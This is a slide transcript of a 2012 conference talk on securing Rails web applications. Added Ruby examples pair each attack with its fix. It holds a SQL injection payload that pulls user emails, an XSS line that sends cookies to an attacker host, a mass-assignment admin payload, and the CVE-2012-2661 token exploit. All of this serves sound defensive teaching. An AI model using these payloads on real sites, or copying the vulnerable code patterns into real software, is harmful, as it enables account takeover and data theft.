Slide 1

WEB APPLICATION SECURITY IN RAILS
Uri Nativ
RailsIsrael 2012

Slide 2

Uri Nativ (@unativ)
Head of Engineering, Klarna Tel Aviv
#railsisrael

Slide 3

Buy Now, Pay Later
1. Shop online
2. Receive your goods
3. Pay

Slide 4

Alice

Slide 5

Bob

Slide 6

Alice and Bob

Slide 7

Alice and Bob

Slide 8

Alice and Bob Like Duh?

Slide 9

Alice and Bob MicroBlogging ... #$@# %#@&*#$

Slide 10

Alice and Bob Hack it!

Slide 11

SQL INJECTION

Slide 12

SQL Injection

    @results = Micropost.where("content LIKE '%#{params[:query]}%'").all

    SELECT "microposts".* FROM "microposts" WHERE (content LIKE '%SEARCHSTRING%')

Slide 13

SQL Injection

    SELECT "microposts".* FROM "microposts" WHERE (content LIKE '%SEARCHSTRING%')

Injected query string:

    XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --

Slide 14

SQL Injection

    SELECT "microposts".* FROM "microposts" WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')

Slide 16

SQL Injection - countermeasures

    @results = Micropost.where("content LIKE ?", "%#{params[:query]}%").all
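
Added example (not from the talk and not ActiveRecord's code): quote_literal and bind are simplified stand-ins for ActiveRecord's string quoting and placeholder substitution, used to show why the placeholder form above keeps the slide 13 payload inside the string literal instead of turning it into SQL. It goes one step beyond the slide: like_escape handles % and _, which remain LIKE wildcards even inside a bound value.

```ruby
# Simplified model of ActiveRecord's String quoting: wrap in single quotes and
# double any embedded single quote (assumes standard SQL quoting rules).
def quote_literal(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Vulnerable form (slide 12): the parameter is interpolated into the SQL text.
def search_sql_interpolated(query)
  "SELECT microposts.* FROM microposts WHERE (content LIKE '%#{query}%')"
end

# Stand-in for sanitize_sql_array: each '?' is replaced by one quoted value.
def bind(sql, *values)
  values = values.dup
  sql.gsub("?") { quote_literal(values.shift) }
end

# Countermeasure (slide 16): the value travels as a quoted bind, never as SQL.
def search_sql_bound(query)
  bind("SELECT microposts.* FROM microposts WHERE (content LIKE ?)", "%#{query}%")
end

# Beyond the slide: '%' and '_' are LIKE wildcards even inside a bound value.
# Escaping them (with a declared ESCAPE character) makes the term match literally.
def like_escape(term, escape: "\\")
  term.gsub(/[\\%_]/) { |ch| escape + ch }
end

def search_sql_literal(term)
  bind("SELECT microposts.* FROM microposts WHERE (content LIKE ? ESCAPE '\\')",
       "%#{like_escape(term)}%")
end

# Strips every single-quoted literal, leaving only the SQL the parser would act on.
def outside_literals(sql)
  sql.gsub(/'(?:[^']|'')*'/, "''")
end

# Constructed payload with the same shape as the one on slide 13.
PAYLOAD = "XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- "

if __FILE__ == $PROGRAM_NAME
  puts search_sql_interpolated(PAYLOAD)   # UNION has become real SQL
  puts search_sql_bound(PAYLOAD)          # UNION is still inside the literal
  puts search_sql_literal("100%_sure")
end
```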

Slide 17

CROSS SITE SCRIPTING XSS

Slide 18

XSS

    <%= raw feed_item.content %>

Slide 19

XSS

    document.write('<img src="http://www.attacker.com/x.png?' + document.cookie + '">');

Slide 20

XSS - countermeasures

    <%= sanitize feed_item.content, :tags => ['a'] %>

Slide 21

XSS
The Attack:
- Execute arbitrary code / defacement
- JSON is not escaped by default
- CSS can be injected as well
Countermeasures:
- Never trust data from the users
- Use Markdown (e.g. Redcarpet gem)
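
Added example (not from the talk and not Rails' own helpers): the slide 18 template rendered through Ruby's standard ERB, with raw modelled as an identity function and h as ERB::Util.html_escape, fed the slide 19 payload as a constructed feed item. Rails' sanitize helper from slide 20 is a parser-based allowlist and is not modelled here.

```ruby
require "erb"

# Model of Rails' raw helper: the string goes into the page untouched.
def raw(content)
  content
end

# Model of Rails' default ERB output escaping (what <%= %> does without raw).
def h(content)
  ERB::Util.html_escape(content)
end

FeedItem = Struct.new(:content)

VULNERABLE_TEMPLATE = "<li><%= raw feed_item.content %></li>"   # slide 18
ESCAPED_TEMPLATE    = "<li><%= h feed_item.content %></li>"

def render(template, feed_item)
  ERB.new(template).result(binding)
end

# Constructed feed item carrying the cookie-exfiltration script from slide 19.
ATTACK_CONTENT = "<script>document.write('<img src=\"http://www.attacker.com/x.png?' " \
                 "+ document.cookie + '\">');</script>"

# A browser only runs the content if the <script> tag survives rendering.
def script_tag_survives?(html)
  html.include?("<script>")
end

def render_vulnerable(content)
  render(VULNERABLE_TEMPLATE, FeedItem.new(content))
end

def render_escaped(content)
  render(ESCAPED_TEMPLATE, FeedItem.new(content))
end
```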

Slide 22

CROSS SITE REQUEST FORGERY CSRF

Slide 23

CSRF (step 1)
www.blog.com

Slide 24

CSRF (step 2)
www.blog.com
www.freeiPad.com: "Click here for free iPad" ... document.evilform.submit()

Slide 25

CSRF (step 3)
www.blog.com
www.freeiPad.com ... document.evilform.submit()

Slide 26

CSRF (step 4)
www.blog.com
www.freeiPad.com ... document.evilform.submit()
POST /blogpost Content="Kick Me!"

Slide 27

Slide 28

CSRF
routes.rb

    match '/delete_post/:id', to: 'microposts#destroy'

Slide 29

CSRF

    class ApplicationController < ActionController::Base
      # commented to easily test forms
      # protect_from_forgery
      ...
    end

Slide 30

CSRF
The Attack:
- Attacker sends requests on the victim's behalf
- Doesn't depend on XSS
- Attacker doesn't need to be logged in
Countermeasures:
- Use Rails CSRF default protection (do not override it)
- Use GET for queries
- Use POST/DELETE/... when updating data
- Add a sign-out link
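
Added example (not the talk's code and not Rails' implementation): a pared-down model of what protect_from_forgery checks, showing why the slide 28 GET route and the slide 29 commented-out filter both let the forged request from slides 23-26 through. SAFE_METHODS, csrf_token, hidden_token_field and verified_request? are names chosen for this example; the session is a plain Hash.

```ruby
require "securerandom"

SAFE_METHODS = %w[GET HEAD].freeze

# Constant-time comparison so the check does not leak how many leading bytes match.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# One token per session, minted on first use; form_for embeds it as a hidden field.
def csrf_token(session)
  session[:_csrf_token] ||= SecureRandom.base64(32)
end

def hidden_token_field(session)
  %(<input type="hidden" name="authenticity_token" value="#{csrf_token(session)}">)
end

# Model of protect_from_forgery's check. Safe methods are never verified, which is
# why a destroy action reachable by GET (slide 28) is forgeable even with the
# filter on; disabling the filter (slide 29) skips the check for every request.
def verified_request?(method, session, params, forgery_protection: true)
  return true unless forgery_protection
  return true if SAFE_METHODS.include?(method)
  expected = session[:_csrf_token]
  return false if expected.nil?
  secure_compare(params["authenticity_token"].to_s, expected)
end

# Constructed scenario from slides 23-26: Alice is logged in to www.blog.com and
# www.freeiPad.com auto-submits a form to it. The attacker's page cannot read
# Alice's token, so the forged body carries none.
def forged_post_accepted?(forgery_protection: true)
  alice_session = {}
  csrf_token(alice_session)
  forged_params = { "content" => "Kick Me!" }
  verified_request?("POST", alice_session, forged_params, forgery_protection: forgery_protection)
end

# A legitimate post from blog.com's own form carries the hidden field's value.
def own_form_post_accepted?
  session = {}
  hidden_token_field(session)
  verified_request?("POST", session, { "authenticity_token" => session[:_csrf_token] })
end
```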

Slide 31

RAILS SPECIFIC ATTACKS

Slide 32

MASS ASSIGNMENT boo[gotcha!]

Slide 33

Mass Assignment

    def create
      @user = User.new(params[:user])
      ...
    end

Slide 34

Mass Assignment

    def create
      @user = User.new(params[:user])
      ...
    end

    { :name => "gotcha", :admin => true }

Slide 35

Mass Assignment - countermeasures
Blacklist

    class User < ActiveRecord::Base
      attr_protected :admin
      ...
    end

Slide 36

Mass Assignment - countermeasures
Whitelist

    class User < ActiveRecord::Base
      attr_accessible :name, :email, :password, :password_confirmation
      ...

Slide 37

Mass Assignment - countermeasures
Global Config (whitelist)

    config.active_record.whitelist_attributes = true

Slide 38

Mass Assignment
The Attack:
- Unprotected by default :(
Countermeasures:
- Whitelist
- Blacklist
- Strong Parameters (whitelist): Rails 4, logic moved to the controller, available as a gem
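
Added example, not from the talk and not Rails' own code: a toy User with the admin flag from slide 34, built from request params with no filter (slides 33-34), through a blacklist (slide 35) and through a whitelist (slides 36-38). protect() and permit() are this example's stand-ins for attr_protected and for attr_accessible / Strong Parameters' permit; ATTACK_PARAMS is a constructed request body.

```ruby
class User
  attr_accessor :name, :email, :admin

  def initialize(attributes = {})
    @admin = false
    # Mass assignment: every writer, admin= included, is reachable from the hash.
    attributes.each { |key, value| public_send("#{key}=", value) }
  end
end

# Blacklist, as attr_protected does (slide 35): strip the named attributes and pass
# everything else. Every new sensitive column must be added here by hand.
def protect(params, *protected_keys)
  protected_keys = protected_keys.map(&:to_s)
  params.reject { |key, _| protected_keys.include?(key.to_s) }
end

# Whitelist, as attr_accessible (slide 36) and Strong Parameters' permit (slide 38)
# do: keep only the named attributes, silently drop anything else.
def permit(params, *allowed_keys)
  allowed_keys = allowed_keys.map(&:to_s)
  params.select { |key, _| allowed_keys.include?(key.to_s) }
end

# Constructed request body: the payload from slide 34.
ATTACK_PARAMS = { "name" => "gotcha", "email" => "gotcha@example.com", "admin" => true }.freeze

def create_unprotected(params)   # slide 33: User.new(params[:user])
  User.new(params)
end

def create_blacklisted(params)
  User.new(protect(params, :admin))
end

def create_whitelisted(params)
  User.new(permit(params, :name, :email))
end
```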

Slide 39

SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)

Slide 40

CVE-2012-2661 SQL Injection

    User.where(:id => params[:user_id], :reset_token => params[:token])

    SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = 'XYZ' LIMIT 1

Slide 41

CVE-2012-2661 SQL Injection

    /users/6/password/edit?token[]

    SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1

Slide 42

CVE-2012-2661 SQL Injection
The Attack:
- SQL Injection
- Affected version: Rails < 3.2.4
Countermeasures:
- Upgrade to Rails 3.2.4 or higher
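
Added example (not from the talk and not ActiveRecord's code): where_clause is a simplified model written to reproduce the two statements on slides 40 and 41, parse_nested_query is a minimal Rack-style parser showing that token[] arrives as an empty Array, and scalar_param! is an assumed defence-in-depth guard that rejects a non-String token before it reaches the query. Upgrading remains the fix the slide gives.

```ruby
require "cgi"

# Integers bind bare, Strings quoted (simplified model of ActiveRecord quoting).
def quote(value)
  value.is_a?(Integer) ? value.to_s : "'#{value.to_s.gsub("'", "''")}'"
end

# Simplified model of the where-hash expansion, written to reproduce the two
# statements on slides 40 and 41 (not ActiveRecord's own code): a String becomes
# an equality; nil or an empty Array, which is what `token[]` parses to, becomes IS NULL.
def where_clause(conditions)
  conditions.map do |column, value|
    case value
    when nil then "users.#{column} IS NULL"
    when Array then value.empty? ? "users.#{column} IS NULL" : "users.#{column} IN (#{value.map { |v| quote(v) }.join(', ')})"
    else "users.#{column} = #{quote(value)}"
    end
  end.join(" AND ")
end

# Minimal Rack-style nested parameter parsing: a key ending in [] yields an Array.
def parse_nested_query(query_string)
  query_string.split("&").each_with_object({}) do |pair, params|
    key, value = pair.split("=", 2).map { |part| CGI.unescape(part) }
    if key.end_with?("[]")
      list = (params[key.delete_suffix("[]")] ||= [])
      list << value unless value.nil?
    else
      params[key] = value.to_s
    end
  end
end

def reset_password_sql(user_id, token)
  "SELECT users.* FROM users WHERE #{where_clause(id: Integer(user_id), reset_token: token)} LIMIT 1"
end

# Assumed defence-in-depth guard (not from the talk; upgrading is the fix):
# only a non-empty String may reach the query as the token.
def scalar_param!(params, name)
  value = params[name]
  raise ArgumentError, "#{name} must be a non-empty string" unless value.is_a?(String) && !value.empty?
  value
end

def safe_reset_password_sql(user_id, params)
  reset_password_sql(user_id, scalar_param!(params, "token"))
end
```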

Slide 43

Brakeman

    --------------------------------------
    | Warning Type               | Total |
    --------------------------------------
    | Cross Site Scripting       | 2     |
    | Cross-Site Request Forgery | 1     |
    | Denial of Service          | 1     |
    | Redirect                   | 1     |
    | SQL Injection              | 4     |
    --------------------------------------

Slide 44

CONCLUSIONS

Slide 45

Make Love not War

Slide 46

Conclusions
- Know the threats: OWASP Top 10
- Follow Rails conventions
- Ruby on Rails Security Guide: http://guides.rubyonrails.org/security.html
- The Ruby on Rails security project: http://www.rorsecurity.info
- Rails security mailing list: http://groups.google.com/group/rubyonrails-security

Slide 47

Thanks to...
- Daniel Amselem for pair programming
- Irit Shainzinger for the cool graphics
- Michael Hartl for his microblogging app tutorial

Slide 48

Pay Online – Safer and Simpler https://github.com/unativ/sample_app